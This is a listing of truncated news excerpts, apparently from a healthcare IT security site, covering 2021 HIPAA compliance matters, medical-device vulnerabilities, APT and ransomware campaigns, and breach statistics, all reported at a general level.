The HHS’ Health Sector Cybersecurity Coordination Center (HC3) has issued a threat brief for the healthcare industry warning about the use of the Cobalt Strike penetration testing tool by cyber threat actors. Cobalt Strike is a powerful red team tool used by penetration testers when conducting risk and vulnerability assessments, but it can also be abused and is increasingly being used by cyber threat actors in attacks on the healthcare and public health sector. Cobalt Strike can be used for reconnaissance to gain valuable information about the target infrastructure, allowing threat actors to determine the best use of their time when attacking healthcare networks. The system profiler function can be used to discover client-side applications used by a target and provides version information. The system profiler starts a local web server, fingerprints visitors, identifies internal IP addresses behind a proxy, and gathers reconnaissance data from the web log and detected applications to provide information on targets. Cobalt Strike includes a spear phish tool that can be used to create and send...

3 Medium Severity Vulnerabilities Identified in Philips MRI Solutions
Nov 10

Three medium severity vulnerabilities have been identified in Philips MRI products which, if exploited, could allow an unauthorized individual to run software, modify the device configuration, view and update files, and export data, including protected health information (PHI), to an untrusted environment. Aguilar found insufficient access controls which fail to restrict access by unauthorized individuals (CVE-2021-3083), the software assigns an owner who is outside the intended control sphere (CVE-2021-3085), and sensitive data is exposed to individuals who should not be provided with access (CVE-2021-3084). Each of the vulnerabilities has been assigned a CVSS v3 base score of 6.2 out of 10. The vulnerabilities were identified by Secureworks Adversary Group consultant Michael Aguilar, and affect Philips MRI 1.5T: Version 5.x.x, and MRI 3T: Version 5.x.x. Aguilar reported the flaws to Philips and a patch has been scheduled for release by October 2022. In the meantime, Philips recommends implementing mitigating measures to prevent the vulnerabilities from being exploited. The...

Chinese APT Group Compromised Healthcare Organizations by Exploiting Zoho Password Management Platform Flaw
Nov 08

An advanced persistent threat (APT) actor has been conducting an espionage campaign that has seen the systems of at least 9 organizations compromised. The campaign targeted organizations in a range of critical sectors, including healthcare, energy, defense, technology, and education. The campaign was identified by security researchers at Palo Alto Networks and while the identity of the hacking group has yet to be confirmed, the researchers believe the attacks were most likely conducted by the Chinese state-sponsored hacking group APT27, aka Iron Tiger, Emissary Panda, TG-3390, and LuckyMouse based on the use of hacking tools and techniques that match previous APT27 activity. The campaign exploited a critical vulnerability (CVE-2021-40539) in ManageEngine ADSelfService Plus, an enterprise password management and single sign-on solution developed by Zoho. Successful exploitation of the flaw allows remote attackers to execute arbitrary code and take full control of vulnerable systems. On September 17, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued a...

Is G Suite HIPAA Compliant?
Nov 03

Is G Suite HIPAA compliant? Can G Suite be used by HIPAA-covered entities without violating HIPAA Rules? Google has developed G Suite to include privacy and security protections to keep data secure, and those protections are of a sufficiently high standard to meet the requirements of the HIPAA Security Rule. Google will also sign a business associate agreement (BAA) with HIPAA covered entities. So, is G Suite HIPAA compliant? G Suite can be used without violating HIPAA Rules, but HIPAA compliance is more about the user than the cloud service provider.

Making G Suite HIPAA Compliant (by default it isn’t)

As with any secure cloud service or platform, it is possible to use it in a manner that violates HIPAA Rules. In the case of G Suite, all the safeguards are in place to allow HIPAA covered entities to use G Suite in a HIPAA compliant manner, but it is up to the covered entity to ensure that G Suite is configured correctly. It is possible to use G Suite and violate HIPAA Rules.

Obtain a BAA from Google

One important requirement of HIPAA is to obtain a signed, HIPAA-compliant...

FBI: Ransomware Gangs Exploiting Corporate Financial Events to Facilitate Extortion
Nov 03

Ransomware gangs often use double extortion tactics to encourage victims to pay the ransom. In addition to file encryption, sensitive data are stolen and a threat is issued to sell or publish the data if the ransom is not paid. The Federal Bureau of Investigation (FBI) has recently issued a private industry notification warning of a new extortion tactic, where ransomware gangs target companies and organizations that are involved in significant time-sensitive financial events, steal sensitive financial data, then threaten to publish that information if payment is not made. Ransomware gangs conduct extensive research on their victims before launching an attack, which includes gathering publicly available data and nonpublic material. The attacks are then timed to coincide with the release of quarterly earnings reports, SEC filings, initial public offerings, and merger and acquisition activity, with the release of information having the potential to significantly affect the victim’s stock value. “During the initial reconnaissance phase, cyber criminals identify non-publicly...

42% of Healthcare Organizations Have Not Developed an Incident Response Plan
Nov 02

Hacks, ransomware attacks, and other IT security incidents account for the majority of data breaches reported to the Department of Health and Human Services’ Office for Civil Rights, but data breaches involving physical records are also commonplace. According to the Verizon Data Breach Investigations Report, disclosed physical records accounted for 43% of all breaches in 2021, which highlights the need for data security measures to be implemented covering all forms of data. The healthcare industry is extensively targeted by cybercriminals and cyberattacks increased during the pandemic. There was a 73% increase in healthcare cyberattacks in 2020, with those breaches resulting in the exposure of 12 billion pieces of protected health information, according to the 2021 Data Protection Report recently published by Shred-It. The report is based on an in-depth survey of C-level executives, small- and medium-sized business owners, and consumers across North America and identifies several areas where organizations could improve their defenses against external and internal threats....

OCR: Ensure Legacy Systems and Devices are Secured for HIPAA Compliance
Nov 02

The Department of Health and Human Services’ Office for Civil Rights has advised HIPAA-covered entities to assess the protections they have implemented to secure their legacy IT systems and devices. A legacy system is any system that has one or more components that have been supplanted by newer technology and reached end-of-life. When software and devices reach end-of-life, support comes to an end, and patches are no longer issued to correct known vulnerabilities. That makes legacy systems and devices vulnerable to cyberattacks. Healthcare organizations should be aware of the date when support will no longer be provided, and a plan should be developed to replace outdated software and devices; however, there are often valid reasons for continuing to use outdated systems and devices. Legacy systems may work well and be well-tailored to an organization’s business model, so there may be a reluctance to upgrade to new systems that are supported. Upgrading to a newer system may require time, funds, and human resources that are not available, or it may not be possible to replace a legacy...

Microsoft Warns of Ongoing Attacks by SolarWinds Hackers on Service Providers and Downstream Businesses
Nov 01

The advanced persistent threat (APT) actor Nobelium (aka APT29; Cozy Bear) that was behind the 2020 SolarWinds supply chain attack is targeting cloud service providers (CSPs), managed service providers (MSPs), and other IT service providers, according to a recent alert from Microsoft. Rather than conducting attacks on many companies and organizations, Nobelium is favoring a compromise-one-to-compromise-many approach. This is possible because service providers are often given administrative access to customers’ networks to allow them to provide IT services. Nobelium is attempting to leverage that privileged access to conduct attacks on downstream businesses and has been conducting attacks since at least May 2021. Nobelium uses several techniques to compromise the networks of service providers, including phishing and spear phishing attacks, token theft, malware, supply chain attacks, API abuse, and password spraying attacks on accounts using commonly used passwords and passwords that have previously been stolen in data breaches. Once access to service providers’ networks has been...

Study Reveals Healthcare Employees Have Unnecessary Access to Huge Amounts of PHI
Oct 27

A new study has revealed widespread security failures at healthcare organizations, including poor access controls, few restrictions on access to protected health information (PHI), and poor password practices, all of which are putting sensitive data at risk. The study, conducted by the data security and insider threat detection platform provider Varonis, involved an analysis of around 3 billion files at 58 healthcare organizations, including healthcare providers, pharmaceutical companies, and biotechnology firms. The aim of the study was to determine whether security controls had been implemented to secure sensitive data and to help organizations better understand their cybersecurity vulnerabilities in the face of increasing threats. The Health Insurance Portability and Accountability Act (HIPAA) requires access to PHI to be limited to employees who need to view PHI for work purposes. When access is granted, the HIPAA minimum necessary standard applies, and only the minimum amount of PHI should be accessible. Each user must be provided with a unique username that allows access to...

International Law Enforcement Operation Takes Down REvil Ransomware Gang’s Infrastructure
Oct 27

In July 2021, the notorious REvil (Sodinokibi) ransomware gang appeared to have ceased operations, with both its Tor payment site and data leak blog suddenly going offline. The DarkSide ransomware operation also went quiet, leading many security experts to believe that the operators of the ransomware-as-a-service (RaaS) operations were laying low or that there had been a law enforcement takedown of their infrastructure. Some of the servers used by the REvil gang were brought back online temporarily but were shut down again in mid-October. This temporary resurrection was thought to be an affiliate attempting to continue the operation. The apparent shutdown of the REvil operation followed two major attacks on the food production company JBS and the software management company Kaseya, with the latter attack affecting around 50 managed service providers and up to 1,500 downstream businesses. Associates of the REvil gang had developed the DarkSide ransomware variant, which was used in the attack on Colonial Pipeline and caused its fuel pipeline to the Eastern seaboard of the United...

Cybersecurity Awareness Month: Put Cybersecurity First
Oct 25

The theme of the fourth week of Cybersecurity Awareness Month is “Cybersecurity First”, with the focus on getting the message across to businesses about the need for cybersecurity measures to address vulnerabilities in products, processes, and people.

Cybersecurity Advice for Companies

One study suggests 64% of companies worldwide have experienced some form of cyberattack and the rate at which attacks are occurring is increasing. It is essential for companies to ensure that cybersecurity measures are incorporated when developing apps, products, or new services and for cybersecurity to be considered at the design stage. Safeguards need to be baked into products from the start. Cybersecurity should not be an afterthought. Businesses need to have a thorough understanding of their IT environment and what assets need to be protected. An inventory should be created for all assets and the location of all sensitive data should be known. A plan then needs to be developed to protect those assets, which should include overlapping layers of protection using technologies such as firewalls, spam...

44% of Healthcare Organizations Don’t Have Full Visibility into 3rd Party Access and Permissions
Oct 25

A recent study conducted by the Ponemon Institute on behalf of cybersecurity firm SecureLink has explored the state of third-party security and critical access management at healthcare organizations. As with other industry sectors, remote access to internal systems is provided to third parties to allow them to perform essential business functions. Whenever a third party is provided with access, there is a risk that access rights will be abused. Credentials could also potentially be obtained by cyber threat actors and used for malicious purposes. While healthcare organizations are aware that providing access to third parties involves a degree of risk, in healthcare the level of risk is often underestimated. The healthcare industry is extensively targeted by cyber actors and the industry experiences four times the number of data breaches as other industry sectors and the threat is growing. A recent Bitglass study suggests a 55% increase in healthcare data breaches in the United States during the pandemic. SecureLink’s study, the results of which were published in the report, A Matter...

Healthcare CISOs Need Federal Assistance to Deal with Increase in Cyber Threats
Oct 22

A recent survey conducted on Chief Information Security Officer (CISO) members of the College of Healthcare Information Management Executives (CHIME) and Association for Executives in Healthcare Information Security (AEHIS) has highlighted the impact cybersecurity incidents have had on the healthcare industry and the need for federal assistance to deal with the threats. The healthcare industry has long been targeted by cybercriminals, but attacks have increased during the pandemic. 67% of respondents said their organization had experienced a security incident in the past 12 months, with almost half saying they were the victim of a phishing attack. Phishing and business email compromise attacks, malware, ransomware, hacking, and insider threats were the most common security exploits used in cyberattacks on the industry. Cyberattacks can cause patient safety issues. One recent study indicates mortality rates increase following a ransomware attack, as do medical complications and the length of hospital stays. The survey confirmed the impact on patient safety, with 15% of respondents...

September 2021 Healthcare Data Breach Report
Oct 20

There was a 23.7% month-over-month increase in reported healthcare data breaches in September, which saw 47 data breaches of 500 or more records reported to the Department of Health and Human Services’ Office for Civil Rights. While that is more than 1.5 breaches a day, it is under the average of 55.5 breaches per month over the past 12 months. While data breaches increased, there was a major decrease in the number of breached healthcare records, dropping 75.5% from August to 1,253,258 records across the 47 reported data breaches, which is the third-lowest total over the past 12 months.

Largest Healthcare Data Breaches Reported in September 2021

16 healthcare data breaches were reported in September 2021 that involved the exposure, theft, or impermissible disclosure of more than 10,000 healthcare records. The largest breach of the month was reported by the State of Alaska Department of Health & Social Services. The breach was initially thought to have resulted in the theft of the personal and protected health information (PHI) of all state residents, although the breach was...

Alert Issued About Ongoing BlackMatter Ransomware Attacks
Oct 19

A joint alert has been issued by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), and the Cybersecurity and Infrastructure Security Agency (CISA) about ongoing BlackMatter ransomware attacks. The group has been conducting attacks in the United States since July 2021, which have included attacks on critical infrastructure entities and two organizations in the U.S. Food and Agriculture Sector. Evidence has been obtained that links the gang to the DarkSide ransomware gang that conducted attacks between September 2020 and May 2021, including the attack on Colonial Pipeline, with BlackMatter ransomware potentially a rebrand of the DarkSide operation. Investigations into the attacks have allowed the agencies to obtain important information about the tactics, techniques, and procedures (TTPs) of the group, and an analysis has been performed on a sample of the ransomware in a sandbox environment. The group is known to use previously compromised credentials to gain access to victims’ networks, then leverages the Lightweight Directory Access Protocol (LDAP) and...

Cybersecurity Awareness Month: Fight the Phish!
Oct 12

According to the Verizon Data Breach Investigations Report, phishing accounted for around 80% of all reported phishing attacks in 2019 and since the pandemic began in 2020 phishing attacks and associated scams have been thriving. In 2020, 74% of US organizations experienced a successful phishing attack. Phishing attacks typically use emails or malicious websites – or both – to obtain sensitive information such as login credentials or to infect devices with malware and viruses. Phishing attacks involve a lure to get the recipient to take a certain action, such as clicking on a hyperlink in an email or opening a malicious email attachment. Email addresses, sender names, phone numbers, and website URLs are often spoofed to trick people into believing they are interacting with a familiar and trusted source. The 2021 Cost of Phishing Study conducted by the Ponemon Institute/Proofpoint suggests the cost of phishing attacks has quadrupled over the past 6 years, with large U.S. firms now losing an average of $14.83 million a year to phishing attacks. An average-sized U.S. company employing...

FIN12 Ransomware Gang Actively Targeting the Healthcare Sector
Oct 12

Ransomware is currently the biggest cyber threat faced by the healthcare industry. Attacks often cripple healthcare IT systems for weeks or months and prevent medical records from being accessed. One study by the Ponemon Institute/Censinet shows attacks result in treatment delays, an increase in complications, poorer patient outcomes, and an increase in mortality rates. Several ransomware gangs have publicly stated they will not attack the healthcare industry, but that is certainly not true of FIN12. According to a recently published analysis of the ransomware actor by Mandiant, around 20% of the attacks conducted by the group have been on the healthcare industry. FIN12 is a prolific ransomware actor that focuses on big game targets. Almost all the victims of FIN12 have annual revenues over $300 million, with an average of almost $6 billion. FIN12 has been active since at least 2018 and has largely targeted North America where 85% of its attacks have occurred, although the gang has recently expanded geographically and now also conducts attacks in Europe and the Asia Pacific region....

Ransom Disclosure Act Requires Disclosure of Payments to Ransomware Gangs Within 48 Hours
Oct 11

A new bill has been introduced that, if passed, will require victims of ransomware attacks to disclose any payments made to the attackers to the Department of Homeland Security (DHS) within 48 hours of the ransom being paid. The Ransom Disclosure Act was introduced by Sen. Elizabeth Warren (D-Mass.) and Rep. Deborah Ross (D-N.C.) and aims to provide the DHS with the data it needs to investigate ransomware attacks and improve understanding of how cybercriminal enterprises operate, thus allowing the DHS to gain a much better picture of the ransomware threat facing the United States. Between 2019 and 2020 ransomware attacks increased by 62% worldwide, and by 158% in the United States. The Federal Bureau of Investigation (FBI) received 2,500 complaints about ransomware attacks in 2020, up 20% from the previous year and there were more than $29 million in reported losses to ransomware attacks in 2020. Not all ransomware attacks are reported. Many victims choose to quietly pay the attackers for the keys to decrypt their data and prevent the public disclosure of any data stolen in the...
